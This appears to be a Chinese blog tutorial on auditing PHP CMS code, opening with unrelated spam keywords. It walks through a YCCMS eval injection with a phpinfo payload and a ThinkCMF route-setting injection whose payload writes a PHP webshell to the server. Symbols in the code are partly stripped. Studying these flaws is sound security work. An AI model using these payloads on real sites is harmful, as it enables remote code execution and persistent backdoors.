做押韵句子的网站,西安市城乡建设管理局网站6,做广告推广哪个平台好,wordpress js外链准备工作
了解CMS的基本信息
该CMS使用的是什么设计模式#xff1f;该CMS每个目录大概负责的功能(视图、缓存、控制器等)。该CMS处理请求的基本流程是如何走的#xff1f;以及在系统中使用的全局过滤函数是如何对数据进行处理的#xff1f;
代码审计方法
敏感函数回溯
…准备工作
了解CMS的基本信息
该CMS使用的是什么设计模式该CMS每个目录大概负责的功能(视图、缓存、控制器等)。该CMS处理请求的基本流程是如何走的以及在系统中使用的全局过滤函数是如何对数据进行处理的
代码审计方法
敏感函数回溯
大多数的漏洞主要是php的函数的使用不当造成的只要找到这些使用不当的函数就可以快速的发现想要挖掘的漏洞。
定向功能分析
该方法主要是根据程序的业务逻辑和业务功能进行审计的。
通读全文
通过对整个项目的代码进行阅读从而发现问题这种方法是最全面的但也是最麻烦的。
PHP开发模式
常见的程序编写模式
面向过程写法的程序常见的普通类型常见的PHP框架如Thinkphp、Laravel、Yii。基于原框架上经过二次开发的PHP框架如Thinkcmf、ThinkBlog。企业自行开发的自用的框架。
总的来说一种是基于MVC(M:模型、V:视图、C:控制器)模型开发的程序一种是普通面向过程的开发程序针对不同的设计模式的系统我们应该采用不同的方法做审计。
普通程序设计模式
安全性较低维护困难常常会出现安全性问题开发者必须在每个文件开头加上include。分析回溯较为简单没有复杂的函数转发。URL模式http://localhost/test.php可维护性较低。写法多基于原生代码。可以利用Seay代码审计工具辅助做代码审计。
MVC程序设计模式
安全性较高大团队开发维护单入口应用安全性好只需要统一在入口处做好过滤即可。分析回溯较为复杂复杂的函数转发。URL模式http://localhost/index.php?mhomecuseraloginhttp://localhost/index.php/home/user/login可维护性较高写法多基于已封装好的函数使用方便简单减少代码冗余。手工审计更为实际工具只能起到辅助作用。
yccms代码执行
用Fortify扫描后发现三个高危代码执行漏洞针对最后一个漏洞分析一下\public\class\Factory.class.php文件 static public function setModel() {$_a self::getA();if (file_exists(ROOT_PATH./model/.$_a.Model.class.php)) eval(self::$_obj new .ucfirst($_a).Model(););return self::$_obj;}static public function getA(){if(isset($_GET[a]) !empty($_GET[a])){return $_GET[a];}return login;}getA()方法接受a的参数作为加载模型的文件名如果该文件存在则执行eval函数实例化该模型。回溯查找setModel()方法在\controller\Action.class.php中找到了在加载Action类时会执行该类的构造函数从而执行setModel()方法。
class Action {protected $_tpl null;protected $_model null; protected function __construct() {$this-_tpl TPL::getInstance();$this-_model Factory::setModel();Tool::setRequest(); //表单转义和html过滤 }在\Controller\ArticleAction.class.php中可以发现ArticleAction类继承了Action类并调用了父类的构造方法可以通过访问此类的方法并构造合适的payload去触发漏洞
?php
//文章控制器
class ArticleAction extends Action{private $_total;public function __construct(){parent::__construct();$this-_sysnew SystemModel();$this-_modelnew ArticleModel();}一个个控制器找找到了直接实例化SearchAction方法的类这里明显调用了我们正好需要的方法这样一来就可以访问到最开始的EVAL函数了。
?php
//require str_replace(\\,/,substr(dirname(__FILE__),0,-7))./config/run.inc.php;
define(ROOT_PATH,str_replace(\\,/,substr(dirname(__FILE__),0,-7)));
require ROOT_PATH./config/config.inc.php;
require ROOT_PATH./public/smarty/Smarty.class.php;
//自动加载类
function __autoload($_className){if(substr($_className,-6)Action){require ROOT_PATH./controller/.ucfirst($_className)..class.php;}elseif(substr($_className, -5) Model){require ROOT_PATH./model/.ucfirst($_className)..class.php;}else{require ROOT_PATH./public/class/.ucfirst($_className)..class.php;}
}
$_tplTPL::getInstance();
$_searchnew SearchAction();
$_search-index();
?回到最开始的地方首先要经过file_exists函数再经过ucfirst函数ucfirst函数是将首字母转换成大写。file_exists函数只要目录存在文件不存在结果也为真的
?php
echo file_exists(f://test/../../);
?最终Payload构造为yccms/search/index.php?aAdminModel();phpinfo();//../AdminModel();用来闭合前面的实例化phpinfo();是我们要执行的代码//用来注释后面的多余代码…/用来返回上一级目录。
ThinkCMF框架
各目录功能
api
api目录
app
应用目录
portal
门户应用目录
config.php
应用配置文件
common.php
模块函数文件
controller
控制器目录
model
模型目录
common.php
应用公共(函数)文件
config.php
应用(公共)配置文件
database.php
数据库配置文件
route.php
路由配置文件
public
WEB 部署目录对外访问目录
api
api入口目录
plugins
插件目录
static
静态资源存放目录(css,js,image)
themes
前后台主题目录
upload
文件上传目录
index.php
入口文件
robots.txt
爬虫协议文件
router.php
快速测试文件
.htaccess apache
重写文件
simplewind
cmf
CMF核心库目录
extend
扩展类库目录
thinkphp
thinkphp目录
vendor
第三方类库目录Composer
代码执行漏洞
当在后台【URL美化】功能中插入PHP代码保存后重新访问该页面PHP代码会被执行在public下创建11.php导致产生代码执行漏洞。 尝试抓包看看我们在保存设置到最后执行PHP代码之间经历了什么 一共提交了两个请求第一个请求提交到admin目录下route控制器中的editpost方法
该方法是用来接收参数后更新到数据库。流程应该就是当某个URL地址被访问后路由机制会从数据出中读取是否存在该URL的地址转发如果有则访问到相对应的路径。 第二个请求对route表中的数据排序后调用getRoutes方法
跟进getRoutes方法
最后构造payload:.file_put_contents(1.php,?php eval($_POST[1]); ?).
